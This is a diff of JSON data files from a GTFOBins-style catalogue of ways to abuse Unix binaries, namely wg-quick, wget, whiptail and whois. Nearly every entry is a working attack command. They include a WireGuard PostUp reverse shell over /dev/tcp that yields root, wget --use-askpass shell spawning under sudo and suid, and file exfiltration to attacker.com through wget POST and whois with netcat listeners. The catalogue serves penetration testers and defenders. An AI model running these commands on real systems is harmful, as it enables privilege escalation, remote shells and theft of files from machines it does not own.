+        "code": "Exploit,\n\n```\ncat << EOF > ./wg1.conf\n[Interface]\nListenPort = 51821\nPrivateKey = yNwWXHO7oIDQo/b5eS5R0xdVidxm50AwuQoIKTOGy1g=\n\nPostUp = sh -i >& /dev/tcp/127.0.0.1/1234 0>&1\n\nEOF\n```\n\n`sudo wg-quick up ./wg1.conf`\n\nWill send a reverse shell on `127.0.0.1:1234` with root privileges\n\n```\nnc -lvnp 1234\nlistening on [any] 1234 ...\nconnect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 55456\n# whoami\nroot\n```\n\nAnother more direct way to obain a shell is to avoid the usage of netcat at all\n\n```\ncat << EOF > ./wg1.conf\n[Interface]\nListenPort = 51821\nPrivateKey = yNwWXHO7oIDQo/b5eS5R0xdVidxm50AwuQoIKTOGy1g=\n\nPostUp = /bin/bash -p\n\nEOF\n```\n\n`sudo wg-quick up ./wg1.conf`\n\nThis will directly drop to a `root` shell.\n\n```\n#whoami\nroot\n```\n"
+      }
+    ]
+  }
+}

gtfo/data/wget.json

@@ -1,39 +1,45 @@
 {
   "functions": {
+    "shell": [
+      {
+        
+        "code": "TF=$(mktemp)\nchmod +x $TF\necho -e '#!/bin/sh\\n/bin/sh 1>&0' >$TF\nwget --use-askpass=$TF 0\n"
+      }
+    ],
     "file-upload": [
       {
-        "description": "Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Use '--post-data' to send hard-coded data.",
-        "code": "wget --post-file=[file] [url]\n"
+        "description": "Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Use `--post-data` to send hard-coded data.",
+        "code": "URL=http://attacker.com/\nLFILE=file_to_send\nwget --post-file=$LFILE $URL\n"
       }
     ],
     "file-read": [
       {
-        "description": "The file to be read is treated as a list of URLs, one per line, which are actually fetched by 'wget'. The content appears, somewhat modified, as error messages, thus this is not suitable to read arbitrary binary data.",
-        "code": "wget -i [file]\n"
+        "description": "The file to be read is treated as a list of URLs, one per line, which are actually fetched by `wget`. The content appears, somewhat modified, as error messages, thus this is not suitable to read arbitrary binary data.",
+        "code": "LFILE=file_to_read\nwget -i $LFILE\n"
       }
     ],
     "file-write": [
       {
-        "description": "The data to be written is treated as a list of URLs, one per line, which are actually fetched by 'wget'. The data is written, somewhat modified, as error messages, thus this is not suitable to write arbitrary binary data.",
-        "code": "TF=$(mktemp)\necho [data] > $TF\nwget -i $TF -o [file]\n"
+        "description": "The data to be written is treated as a list of URLs, one per line, which are actually fetched by `wget`. The data is written, somewhat modified, as error messages, thus this is not suitable to write arbitrary binary data.",
+        "code": "LFILE=file_to_write\nTF=$(mktemp)\necho DATA > $TF\nwget -i $TF -o $LFILE\n"
       }
     ],
     "file-download": [
       {
         "description": "Fetch a remote file via HTTP GET request.",
-        "code": "wget [url] -O [file]\n"
+        "code": "URL=http://attacker.com/file_to_get\nLFILE=file_to_save\nwget $URL -O $LFILE\n"
       }
     ],
     "suid": [
       {
-        "description": "Fetch a remote file via HTTP GET request.",
-        "code": "./wget [url] -O [file]\n"
+        
+        "code": "TF=$(mktemp)\nchmod +x $TF\necho -e '#!/bin/sh -p\\n/bin/sh -p 1>&0' >$TF\n./wget --use-askpass=$TF 0\n"
       }
     ],
     "sudo": [
       {
-        "description": "Fetch a remote file via HTTP GET request.",
-        "code": "sudo wget [url] -O [file]\n"
+        
+        "code": "TF=$(mktemp)\nchmod +x $TF\necho -e '#!/bin/sh\\n/bin/sh 1>&0' >$TF\nsudo wget --use-askpass=$TF 0\n"
       }
     ]
   }

gtfo/data/whiptail.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        
+        "code": "LFILE=file_to_read\nwhiptail --textbox --scrolltext \"$LFILE\" 0 0\n"
+      }
+    ],
+    "suid": [
+      {
+        
+        "code": "LFILE=file_to_read\n./whiptail --textbox --scrolltext \"$LFILE\" 0 0\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "LFILE=file_to_read\nsudo whiptail --textbox --scrolltext \"$LFILE\" 0 0\n"
+      }
+    ]
+  }
+}

gtfo/data/whois.json

@@ -1,25 +1,24 @@
 {
-  "description": "'whois' hangs waiting for the remote peer to close the socket.",
   "functions": {
     "file-upload": [
       {
-        "description": "Send a text file to a TCP port. Run 'nc -lp [port] > [file]' on the attacker box to collect the file. The file has a trailing '$'\\x0d\\x0a'' and its length is limited by the maximum size of arguments.",
-        "code": "whois -h [host] -p [port] \"`cat [file]`\"\n"
+        "description": "Send a text file to a TCP port. Run `nc -l -p 12345 > \"file_to_save\"` on the attacker box to collect the file. The file has a trailing `$'\\x0d\\x0a'` and its length is limited by the maximum size of arguments.",
+        "code": "RHOST=attacker.com\nRPORT=12345\nLFILE=file_to_send\nwhois -h $RHOST -p $RPORT \"`cat $LFILE`\"\n"
       },
       {
-        "description": "Send a binary file to a TCP port. Run 'nc -lp [port] | tr -d $'\\x0d' | base64 -d > [file]' on the attacker box to collect the file. The file length is limited by the maximum size of arguments.",
-        "code": "whois -h [host] -p [port] \"`base64 [file]`\"\n"
+        "description": "Send a binary file to a TCP port. Run `nc -l -p 12345 | tr -d $'\\x0d' | base64 -d > \"file_to_save\"` on the attacker box to collect the file. The file length is limited by the maximum size of arguments.",
+        "code": "RHOST=attacker.com\nRPORT=12345\nLFILE=file_to_send\nwhois -h $RHOST -p $RPORT \"`base64 $LFILE`\"\n"
       }
     ],
     "file-download": [
       {
-        "description": "Fetch remote text file from a remote TCP port. Run 'nc -lp [port] < [file]' on the attacker box to send the file. The file has instances of '$'\\x0d'' stripped.",
-        "code": "whois -h [host] -p [port] > [file]\n"
+        "description": "Fetch remote text file from a remote TCP port. Run `nc -l -p 12345 < \"file_to_send\"` on the attacker box to send the file. The file has instances of `$'\\x0d'` stripped.",
+        "code": "RHOST=attacker.com\nRPORT=12345\nLFILE=file_to_save\nwhois -h $RHOST -p $RPORT > \"$LFILE\"\n"
       },
       {
-        "description": "Fetch remote binary file from a remote TCP port. Run 'base64 [file] | nc -lp [port]' on the attacker box to send the file.",
-        "code": "whois -h [host] -p [port] | base64 -d > [file]\n"
+        "description": "Fetch remote binary file from a remote TCP port. Run `base64 \"file_to_send\" | nc -l -p 12345` on the attacker box to send the file.",
+        "code": "RHOST=attacker.com\nRPORT=12345\nLFILE=file_to_save\nwhois -h $RHOST -p $RPORT | base64 -d > \"$LFILE\"\n"
       }
     ]
   }
-}
+}